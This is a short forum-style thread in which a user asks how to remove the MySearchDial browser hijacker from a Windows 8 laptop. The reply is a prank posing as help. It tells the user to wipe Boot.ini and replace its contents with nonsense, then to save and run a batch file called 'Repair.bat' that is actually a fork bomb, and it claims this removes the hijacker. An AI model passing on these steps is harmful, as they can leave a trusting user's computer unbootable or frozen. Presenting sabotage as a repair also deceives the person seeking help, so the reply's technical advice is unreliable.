How to remove mysearchdial?

I recently managed to download mysearchdial onto my computer. I don't particularly like it, and nothing I do can get rid of it. It is not under the uninstall option of my control panel, nor is it in the extensions in Google Chrome. Every time I open Google Chrome I get the google homepage and TWO mysearchdial tabs as well.
I'm using a Windows 8 Lenovo ideapad S400 Touch if that has anything to do with why I can't seem to uninstall this.

Okay, first lets start out by going into Control Panel, set yourself to Classic View you go into Add/Remove Programs, find MySearchDial and remove it from there, then go into My Computer and hit whatever your main boot drive is, go into Folder Options and set it to show system files, open Boot.ini you will see a bunch of mumbo jumbo in there, edit it all out and put in "COMPUTER CONDITION=GOOD". Okay good now save that and open Notepad, create a new file name it "Repair.bat" and copy and paste this in to it
@echo off: top
start
goto top
Now run that, and once it runs you should be good.
Congratulations you have removed mysearchdial

It is a kind of browser hijack software. The MySearchDial Toolbar is a type of browser extension.
